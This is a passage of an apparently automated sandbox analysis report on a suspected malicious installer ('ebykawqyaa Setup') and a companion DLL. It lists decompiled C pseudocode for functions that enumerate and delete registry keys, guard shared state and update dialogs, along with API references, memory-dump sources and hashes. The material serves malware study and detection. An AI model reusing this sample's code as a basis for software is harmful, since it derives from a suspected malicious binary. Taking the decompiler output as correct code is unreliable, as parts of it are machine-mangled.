						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                                                                0x00402a79
                                                                0x00402a8a
                                                                0x00402a92
                                                                0x00402aba
                                                                0x00402aa1
                                                                0x00402aa4
                                                                0x00402af4
                                                                0x00402afa
                                                                0x00402afc
                                                                0x00000000
                                                                0x00402afc
                                                                0x00402ab1
                                                                0x00402ab6
                                                                0x00402ab8
                                                                0x00000000
                                                                0x00000000
                                                                0x00402ab8
                                                                0x00402acf
                                                                0x00402ad7
                                                                0x00402ade
                                                                0x00402b04
                                                                0x00402b0a
                                                                0x00000000
                                                                0x00000000
                                                                0x00402b12
                                                                0x00402b18
                                                                0x00402b1a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402b1a
                                                                0x00000000
                                                                0x00402aed
                                                                0x00402b01

                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Close$DeleteEnumOpen
                                                                • String ID:
                                                                • API String ID: 1912718029-0
                                                                • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                                • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732219A0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E732219A0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				intOrPtr _t44;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t65;

				_v8 = _a4;
				0x73220000("%p %p %p\n", _a4, _a8, _a12, __ecx);
				if(_a12 != 0) {
					EnterCriticalSection(0x732250ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					} else {
						 *_a12 =  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_a12 + 4)) =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_a12 + 8)) =  *((intOrPtr*)(_v8 + 0x2c));
						_t64 = _a12;
						_t44 = _v8;
						 *((intOrPtr*)(_t64 + 0x10)) =  *((intOrPtr*)(_t44 + 0x38));
						 *((intOrPtr*)(_t64 + 0x14)) =  *((intOrPtr*)(_t44 + 0x3c));
						_t58 = _a12;
						_t65 = _v8;
						 *((intOrPtr*)(_t58 + 0x18)) =  *((intOrPtr*)(_t65 + 0x40));
						 *((intOrPtr*)(_t58 + 0x1c)) =  *((intOrPtr*)(_t65 + 0x44));
						 *((intOrPtr*)(_a12 + 0x20)) = 1;
						if(_a8 != 0) {
							 *_a8 =  *((intOrPtr*)(_v8 + 8));
						}
						LeaveCriticalSection(0x732250ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}








                                                                0x732219a7
                                                                0x732219bb
                                                                0x732219c7
                                                                0x732219d8
                                                                0x732219e2
                                                                0x732219f4
                                                                0x00000000
                                                                0x73221a01
                                                                0x73221a0a
                                                                0x73221a15
                                                                0x73221a21
                                                                0x73221a24
                                                                0x73221a27
                                                                0x73221a2d
                                                                0x73221a33
                                                                0x73221a36
                                                                0x73221a39
                                                                0x73221a3f
                                                                0x73221a45
                                                                0x73221a4b
                                                                0x73221a56
                                                                0x73221a61
                                                                0x73221a61
                                                                0x73221a68
                                                                0x00000000
                                                                0x73221a6e
                                                                0x732219e2
                                                                0x00000000

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 732219D8
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732219F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID: %p %p %p$1HDP
                                                                • API String ID: 3168844106-3096339026
                                                                • Opcode ID: a40ca0a0716251eba725cd98217d5f7cedfd7c420f76dc11bdad9369eb70e607
                                                                • Instruction ID: 818db1cd52bbcd682d0fa2bd790c5af09e316aec0a68a007f208bf8d45ca74bc
                                                                • Opcode Fuzzy Hash: a40ca0a0716251eba725cd98217d5f7cedfd7c420f76dc11bdad9369eb70e607
                                                                • Instruction Fuzzy Hash: 3731C4B8604209DFCB04CF54C980E9ABBB1FB48315F228299EC198B351D774EE81CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221A80, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 41%
                                                                			E73221A80(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x73220000("%p 0x%08x %p %p %p\n", _a4, _a8, _a12, _a16, _a20);
				if(_a20 != 0) {
					EnterCriticalSection(0x732250ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					} else {
						_push(_a20);
						_push(_a16 + 0x18);
						_push(_a12 + 0x18);
						_push(_a8);
						_v12 = E73222E80(_v8);
						LeaveCriticalSection(0x732250ac);
						return _v12;
					}
				}
				return 0xc0000bbd;
			}





                                                                0x73221a89
                                                                0x73221aa5
                                                                0x73221ab1
                                                                0x73221abf
                                                                0x73221ac9
                                                                0x73221adb
                                                                0x00000000
                                                                0x73221ae8
                                                                0x73221aeb
                                                                0x73221af2
                                                                0x73221af9
                                                                0x73221afd
                                                                0x73221b0a
                                                                0x73221b12
                                                                0x00000000
                                                                0x73221b18
                                                                0x73221ac9
                                                                0x00000000

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221ABF
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221ADB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID: %p 0x%08x %p %p %p$1HDP
                                                                • API String ID: 3168844106-1280280185
                                                                • Opcode ID: bf60b15fdda33f34b6aef81d6af440f54115ef54d95ba26ffd18f3dfe0bb6f71
                                                                • Instruction ID: 608d34632d6700d4ffcd0c811c9f851acab51a6cf5b93f086aee75f946f0d01c
                                                                • Opcode Fuzzy Hash: bf60b15fdda33f34b6aef81d6af440f54115ef54d95ba26ffd18f3dfe0bb6f71
                                                                • Instruction Fuzzy Hash: 661124B5600109EFDB04DF98DD44F9E7BB5AB58306F22C154FD0997241D734AA90DBE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                0x00401ce8
                                                                0x00401cef
                                                                0x00401d1e
                                                                0x00401d26
                                                                0x00401d2d
                                                                0x00401d2d
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                                • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                                • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                                • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73222A30, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 68%
                                                                			E73222A30(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				intOrPtr* _t21;
				intOrPtr _t23;

				_v8 = _a4;
				0x73220000("%p %p\n", _a4, _a8, __ecx);
				if(_a8 != 0) {
					EnterCriticalSection(0x732250ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x732250ac);
						return 0xc0000bbc;
					} else {
						_t21 = _a8;
						_t23 = _v8;
						 *_t21 =  *((intOrPtr*)(_t23 + 0x20));
						 *((intOrPtr*)(_t21 + 4)) =  *((intOrPtr*)(_t23 + 0x24));
						LeaveCriticalSection(0x732250ac);
						return 0;
					}
				}
				return 0xc0000bbd;
			}






                                                                0x73222a37
                                                                0x73222a47
                                                                0x73222a53
                                                                0x73222a61
                                                                0x73222a6b
                                                                0x73222a7d
                                                                0x00000000
                                                                0x73222a8a
                                                                0x73222a8a
                                                                0x73222a8d
                                                                0x73222a93
                                                                0x73222a98
                                                                0x73222aa0
                                                                0x00000000
                                                                0x73222aa6
                                                                0x73222a6b
                                                                0x00000000

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73222A61
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73222A7D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID: %p %p$1HDP
                                                                • API String ID: 3168844106-3920632752
                                                                • Opcode ID: b1c04ce921b56912ac3585f8b157238366a8916028572dd38926e9fce3b5fb18
                                                                • Instruction ID: c18e7f6dde00841a812f4e07f40022e721b483f8186ae38047a3fea6bfd42dcc
                                                                • Opcode Fuzzy Hash: b1c04ce921b56912ac3585f8b157238366a8916028572dd38926e9fce3b5fb18
                                                                • Instruction Fuzzy Hash: 810144B4600208EFD754DF54CD04B5DBBB5BB5830AF63C254F80A8B601C73A9A80CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732216E0, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 58%
                                                                			E732216E0(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x73220000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444831) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					0x73220000(6);
					E73222C10(_v8);
					LeaveCriticalSection(0x732250ac);
					return 0;
				}
			}




                                                                0x732216e7
                                                                0x732216f3
                                                                0x73221700
                                                                0x7322170a
                                                                0x7322171c
                                                                0x00000000
                                                                0x73221729
                                                                0x7322172b
                                                                0x73221737
                                                                0x73221744
                                                                0x00000000
                                                                0x7322174a

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221700
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322171C
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 73221744
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Enter
                                                                • String ID: %p$1HDP
                                                                • API String ID: 2978645861-1684427163
                                                                • Opcode ID: 8626203c5862927da5273c6ac926c5f4486081e69922522b48f5a647798a74da
                                                                • Instruction ID: 665e289c3f906eebabc6452afbb6684fbf9c0ae202a820d860982a9b551a7de3
                                                                • Opcode Fuzzy Hash: 8626203c5862927da5273c6ac926c5f4486081e69922522b48f5a647798a74da
                                                                • Instruction Fuzzy Hash: 84F062B5A00208EFE704DB90DD09F4D7E75AB6830BF238150FD0996241E7756BD0DA92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 73221760, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 62%
                                                                			E73221760(void* __ecx, intOrPtr* _a4) {
				intOrPtr* _v8;

				_v8 = _a4;
				0x73220000("%p\n", _a4, __ecx);
				EnterCriticalSection(0x732250ac);
				if(_v8 == 0 ||  *_v8 != 0x50444830) {
					LeaveCriticalSection(0x732250ac);
					return 0xc0000bbc;
				} else {
					_push(_v8);
					E73222EB0(_v8);
					LeaveCriticalSection(0x732250ac);
					return 0;
				}
			}




                                                                0x73221767
                                                                0x73221773
                                                                0x73221780
                                                                0x7322178a
                                                                0x7322179c
                                                                0x00000000
                                                                0x732217a9
                                                                0x732217ac
                                                                0x732217ad
                                                                0x732217ba
                                                                0x00000000
                                                                0x732217c0

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(732250AC), ref: 73221780
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 7322179C
                                                                • LeaveCriticalSection.KERNEL32(732250AC), ref: 732217BA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Enter
                                                                • String ID: %p$0HDP
                                                                • API String ID: 2978645861-3705288446
                                                                • Opcode ID: 7c2af652b3b12383190d1890534a29694bab54e6148eeaae65f610ce51c1e87e
                                                                • Instruction ID: c706728394ef27323524b23d6f9779dea01bc48c8d762f505fcc29cb1e736675
                                                                • Opcode Fuzzy Hash: 7c2af652b3b12383190d1890534a29694bab54e6148eeaae65f610ce51c1e87e
                                                                • Instruction Fuzzy Hash: 27F030B5A00208EFE704DB94DD08F5D7FB5AB6820BF238154F94996241D7756BC0DA92
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 77%
                                                                			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                                                0x0040464f
                                                                0x00404654
                                                                0x0040465c
                                                                0x0040465d
                                                                0x0040466a
                                                                0x00404672
                                                                0x00404673
                                                                0x00404675
                                                                0x00404677
                                                                0x00404679
                                                                0x0040467c
                                                                0x0040467c
                                                                0x00404683
                                                                0x00404689
                                                                0x00404689
                                                                0x00404690
                                                                0x00404697
                                                                0x0040469a
                                                                0x0040469d
                                                                0x0040469d
                                                                0x004046a1
                                                                0x004046b1
                                                                0x004046b3
                                                                0x004046b6
                                                                0x0040465f
                                                                0x0040465f
                                                                0x00404666
                                                                0x00404666
                                                                0x004046be
                                                                0x004046c9
                                                                0x004046df
                                                                0x004046ef
                                                                0x0040470b

                                                                APIs
                                                                • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                • wsprintfA.USER32 ref: 004046EF
                                                                • SetDlgItemTextA.USER32 ref: 00404702
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s
                                                                • API String ID: 3540041739-3551169577
                                                                • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                                • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 51%
                                                                			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                0x00401bd3
                                                                0x00401bdf
                                                                0x00401be2
                                                                0x00401beb
                                                                0x00401beb
                                                                0x00401bee
                                                                0x00401bf2
                                                                0x00401bfb
                                                                0x00401bfb
                                                                0x00401bfe
                                                                0x00401c02
                                                                0x00401c04
                                                                0x00401c51
                                                                0x00401c53
                                                                0x00401c5c
                                                                0x00401c64
                                                                0x00401c67
                                                                0x00401c67
                                                                0x00401c70
                                                                0x00000000
                                                                0x00401c06
                                                                0x00401c0d
                                                                0x00401c0f
                                                                0x00401c17
                                                                0x00401c1a
                                                                0x00401c42
                                                                0x00401c76
                                                                0x00401c76
                                                                0x00401c1c
                                                                0x00401c2a
                                                                0x00401c32
                                                                0x00401c35
                                                                0x00401c35
                                                                0x00401c1a
                                                                0x00401c79
                                                                0x00401c7c
                                                                0x00401c82
                                                                0x00402866
                                                                0x00402866
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                • SendMessageA.USER32 ref: 00401C42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                                • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004038B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x771a18
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "ebykawqyaa Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x3
						_t27 =  *0x423f68; // 0x771bc4
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x771bdc
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                0x004038b8
                                                                0x004038bd
                                                                0x004038c3
                                                                0x004038c8
                                                                0x004038c8
                                                                0x004038d0
                                                                0x00000000
                                                                0x00000000
                                                                0x004038d2
                                                                0x004038d8
                                                                0x004038e0
                                                                0x004038e2
                                                                0x004038e8
                                                                0x004038e8
                                                                0x004038ea
                                                                0x004038f6
                                                                0x00000000
                                                                0x00000000
                                                                0x004038fa
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004038fc
                                                                0x00403901
                                                                0x0040390a
                                                                0x00403910
                                                                0x00403915
                                                                0x00403929
                                                                0x00403934
                                                                0x0040394c
